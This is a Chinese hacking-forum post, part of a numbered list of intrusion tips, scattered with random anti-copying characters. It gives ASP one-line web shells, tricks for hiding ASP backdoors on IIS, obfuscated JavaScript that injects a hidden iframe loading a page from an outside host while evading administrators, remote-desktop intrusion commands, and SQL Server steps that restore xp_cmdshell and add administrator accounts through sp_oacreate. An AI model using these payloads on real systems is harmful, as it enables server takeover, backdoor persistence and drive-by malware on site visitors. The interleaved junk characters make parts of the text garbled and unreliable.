d).<script language=VBScript runat=server>execute request("sb")</Script>
9 ^! M* ?; T2 De).<%25Execute(request("l"))%25>& H/ X# @+ Y. h1 I+ ~: a* `" z& E
f).<%if request("cmd")<>"" then execute request("pass")%>" H: o3 n& m; D0 i1 r

; v9 @9 W* \6 r* w4 h52、at "12:17" /interactive cmd" p) Q* K) o' \8 N" P
执行后可以用AT命令查看新加的任务) P  g* z: y( U. f- Z4 w
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
9 ^0 |- b( w9 f8 Q8 @$ l* @4 Q8 a9 I
& ]& E; l4 j$ T7 O- q+ p53、隐藏ASP后门的两种方法
/ d- M2 Y9 N. y  X+ u$ k1、建立非标准目录:mkdir images..\
- O+ v0 t- I2 U+ j: O; [% L$ z拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp6 C" N' d$ i" x  U% H
通过web访问ASP木马:http://ip/images../news.asp?action=login: O  I2 J+ x9 s' l, S! Y
如何删除非标准目录:rmdir images..\ /s
0 C. N! }5 H/ p9 e3 [, Q" O2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:- V( n& V- z" X2 w' e! M
mkdir programme.asp) v+ P  v% |. K, R% j
新建1.txt文件内容:<!--#include file=”12.jpg”-->
' ?' k" U& q4 c新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
  g' V& M8 M3 Q% V) E; b# sattrib +H +S programme.asp# K/ X  q* ~' E9 M# q1 h
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt" l% m0 U& G8 g

$ u6 \' G: z* r( u54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。- o3 t. e# k  v% B& F3 i
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。( h( E, [0 c# Z) A7 F4 Y
; }9 n7 _- \+ }4 i
55、JS隐蔽挂马: l2 {7 k( d& [, H9 t2 G
1.! g% `) q: L$ a3 l4 ?
var tr4c3="<iframe src=ht";
* x. t, j, ]& w; ]' }/ G( Ytr4c3 = tr4c3+"tp:/";
& E1 Z8 }. `) r# ktr4c3 = tr4c3+"/ww";
1 \4 a4 m& @, ?8 b6 E7 ptr4c3 = tr4c3+"w.tr4";" S! Q7 |. N( C9 i# e8 }
tr4c3 = tr4c3+"c3.com/inc/m";
. z& t$ I* |0 jtr4c3 = tr4c3+"m.htm style="display:none"></i";
& M$ O; r% C" Z! A3 W- utr4c3 =tr4c3+"frame>'";
: r/ x7 Z$ a% a6 e( kdocument.write(tr4c3);8 G7 O, m- T3 t# k+ R( j$ [
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
/ H- Z% ~# v& O5 s/ d9 A! V) V) S% N
2.0 h* k; J4 y% t- S7 V- W
转换进制,然后用EVAL执行。如
" [" d- s  u' T) V' [; x  reval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");2 B% @# }/ z( c( j+ B4 S: @
不过这个有点显眼。8 a* _; ~% C5 G/ W* I+ M* C
3.' o- T1 C( c" |) y. q) X
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');) H4 A2 ]5 A9 S: j
最后一点,别忘了把文件的时间也修改下。
* j5 w& U9 l% q  S6 D0 Y3 B) K% G% a' s# B9 F2 N0 r: C
56.3389终端入侵常用DOS命令8 R7 f* t4 n! _+ u4 n0 x
taskkill taskkill /PID 1248 /t
, C% F# V, P' I
$ ~1 ~) v# `1 g4 h( utasklist 查进程) P: J0 q; p/ @4 i% w) b
5 ]: _) ^0 e( z: Z1 W
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限) K( y2 }3 [3 b/ K
iisreset /reboot
, Y; l6 S1 w' [5 w6 T1 m: y" Btsshutdn /reboot /delay:1    重起服务器# H: k  Z9 p* _$ [- W  L( n+ L$ f

) y8 e+ v0 Q4 Slogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,3 Q( m5 k$ e& _" o) D

8 C; X' A# r/ k) wquery user 查看当前终端用户在线情况
0 f- V. N/ N* x
' B9 ]8 r+ |9 |+ |$ }: `8 @# v要显示有关所有会话使用的进程的信息,请键入:query process *
2 i; w( M7 D' G$ Y! C% F3 }) v
* [. a  `7 i$ u( I" p" B, P, @要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2; L" S$ C) L0 i: R# y) e6 A9 U. K
$ y, a. Z5 B: V
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
7 Q. d$ r$ N; ?! N6 t0 T" f0 {4 o. p) V  u1 P& t! ^0 P, W
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
  b- w# i6 {& n/ M8 |1 W$ f/ \& m8 J
- q/ X1 F! L$ m4 Y4 G2 g5 I命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
, o: T  N  T- s$ g# h3 T
9 u# ~6 z7 K1 R' D# k9 G* t命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统6 v7 u  W! W9 z" b2 I3 s

5 D! g. y' V/ R/ V/ ?命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。8 u: l% q2 W# E. {4 C& S4 h
( R" A2 B) o8 a! u5 w* D
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
" T, E& o" n( {. |0 ~: ^( ~/ H/ R! y  v2 R
56、在地址栏或按Ctrl+O,输入:2 K4 s8 O' g5 M6 F! p
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;1 F4 G' l& |9 D; w( L
$ y1 O5 c+ U+ W. p
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。" P" p9 a8 N+ O  B$ ?3 X

0 O0 S, |8 m: S. W6 M57、net user的时候,是不能显示加$的用户,但是如果不处理的话,8 K" g  `& `7 E3 e6 e; r& S0 _/ _
用net localgroup administrators是可以看到管理组下,加了$的用户的。
' r' U% S/ h- Y% U2 U
" }6 O# h; w9 d/ H$ D1 g58、 sa弱口令相关命令' E% `+ P* k5 h3 |1 b1 l3 _. ]
: @& T  Y9 Z! r# f5 `
一.更改sa口令方法:
! d+ S. r3 a: T6 a- o用sql综合利用工具连接后,执行命令:
& M! \# d' N7 p) |& X! Y* }exec sp_password NULL,'20001001','sa'& m7 p+ {" f; I% ]
(提示:慎用!). K7 {& Y0 a+ X% _  ]6 k

7 y$ ^  l  ~+ R' K! q* \% K二.简单修补sa弱口令.! x1 d& R# ^. e. c) J, w3 d
* K% g" i" P2 H
方法1:查询分离器连接后执行:5 Y: z; \" ^& Y. n% ~4 v
if exists (select * from
8 C) w5 z# \! P' v" Rdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
2 r% n/ O! h7 m2 o  R/ }OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
9 p8 d3 k- b5 @4 [( H+ I% }5 p6 _7 \& q& `2 b
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
5 v# O5 N5 ^' [
9 t" L" F) ]( `+ _- ^GO
' I% L( k+ I. g6 w6 h% n
# r/ g% v' a/ u7 p1 M9 o1 \1 v* Z然后按F5键命令执行完毕
" m9 S: A! L* A. ]& Z: r: H0 V! |! M1 e; h1 v! J: ]/ m
方法2:查询分离器连接后
; m# ]- \9 l3 @2 x* k第一步执行:use master
8 [3 \2 s+ r+ K5 v2 [第二步执行:sp_dropextendedproc 'xp_cmdshell'  Z! z- y) ^! A- S( q) z
然后按F5键命令执行完毕
3 T: C# c& @8 v, B  F- j/ f3 o8 m3 H* |6 L9 h, ~$ a- U* g- N

2 Z% A; _2 b6 j. r: d1 ]三.常见情况恢复执行xp_cmdshell.
2 S  j5 D7 Q  \9 K- f( g% z
7 E, v* {! m. z2 w6 _% C
9 a8 U; A# m* y9 F1 未能找到存储过程'master..xpcmdshell'.5 e, [; b8 L/ X/ \9 H
   恢复方法:查询分离器连接后,
' W) s2 G% p+ @- {第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
% x7 P+ {$ P0 x2 X7 P3 d第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
" }; ^) D: |: b然后按F5键命令执行完毕
$ K( Z# \/ K( z) f" ^6 P7 o* {3 Q/ I( Y4 l# K
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)1 m- A0 _8 {* }7 u1 r: k6 z2 X8 V
恢复方法:查询分离器连接后,
1 h6 D! L7 _1 G8 T4 i: |: V4 a: F第一步执行:sp_dropextendedproc "xp_cmdshell", t- g1 a! Y& P# a1 I3 A
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
/ y+ U, \8 l% |+ `2 S然后按F5键命令执行完毕
) Z5 Z- Z& X, }* e! C8 K1 `6 T* z, c5 b" W6 p3 ^
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
) Z. U  {6 \2 M6 y# |! o3 `恢复方法:查询分离器连接后,
5 z' \" ?  g1 @; Y* K2 A5 `0 z. Q0 p第一步执行:exec sp_dropextendedproc 'xp_cmdshell'( q$ ?+ j3 ^* \/ C9 ]9 o9 J
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           ( L$ s: ~" U$ M& i. o0 ~
然后按F5键命令执行完毕
& q5 V' d* f% g# s
  A/ e% \3 o) L' x0 Y  M, P四.终极方法., ^( A# k: w2 J+ d1 d6 P' z0 N
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:, i6 e4 t8 @6 C0 O& u4 a
查询分离器连接后,* E% I2 B5 [$ L+ v& I2 p! E
2000servser系统:
1 ?3 v9 b' c8 b/ u' Q* ^  ~declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
* i# b" A9 n. l* v7 W; n
6 ^$ t0 S$ L, }/ Pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add', `: J- x4 _4 R/ s
3 t' d2 y9 f$ Y
xp或2003server系统:
* `2 R% Z5 z) f9 a# D6 _, U+ v& Z, y* s2 ^% p. G. l9 X
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'' k  m0 L$ G0 Y/ R# w, z2 q
. x; E& i( N: Z- k8 M0 z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'; E. A& a! y8 N$ i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表